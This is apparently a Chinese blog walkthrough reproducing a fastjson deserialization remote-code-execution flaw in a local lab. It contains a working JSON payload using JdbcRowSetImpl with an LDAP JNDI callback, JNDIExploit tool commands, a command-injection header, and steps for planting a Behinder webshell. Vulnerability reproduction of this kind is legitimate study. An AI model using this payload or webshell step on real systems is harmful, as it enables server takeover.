1.环境搭建
这里直接在本地搭建了一个环境并没有采用docker部署的形式,有需要的可以在后台私信我获取
搭建好运行主程序即可 manven有问题的话可以看看上篇写的文章
该图为搭建好的页面
2.漏洞描述
2.1什么是fastjson
具体可以参考这篇文章
FastJson的介绍与使用(一)_maven fastjson-CSDN博客
fastjson最主要的功能就是可以将Java对象和json之间来回转化,而这个漏洞出现的原因就是在反序列化的过程中
2.2fastjson反序列化漏洞原理
fastjson在序列化的过程中使用了Auto Type功能,这个功能在序列化的时候会带有一个@type来指示字符的原始类型,在反序列化的时候会读取@type。这个时候就可以在反序列化的时候构造一个恶意的payload进行攻击
3.漏洞复现
首先用bp抓包 发送到repeater模块中 将get请求方式改为post 将 x-www-form-urlencoded改为 json
接着使用 JNDIExploit-1.4-SNAPSHOT.jar工具进行攻击 需要的可以后台私聊我
启动命令为
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 127.0.0.1 //启动命令
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 127.0.0.1 -u //查看payload
首先使用 java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 127.0.0.1 -u 查看需要用到的payload为
接着启动该工具
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 127.0.0.1
bp数据包如下图所示
POST / HTTP/1.1
Host: 127.0.0.1:8081
cmd: whoami
Cache-Control: max-age=0
sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 204
{"a": {"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b": {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho","autoCommit":true}}
ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho //该命令用于在中间件为Tomcat时命令执行结果的回显,通过添加header cmd:whoami的方式传递想要执行的命令
到这一步漏洞已经利用成功了 接下来可以打入冰蝎马进行getshell
4.Getshell
payload如下图所示
bp数据包如下
用浏览器访问 http://127.0.0.1:8081/ateam 出现以下页面说明打入成功
接着用冰蝎连接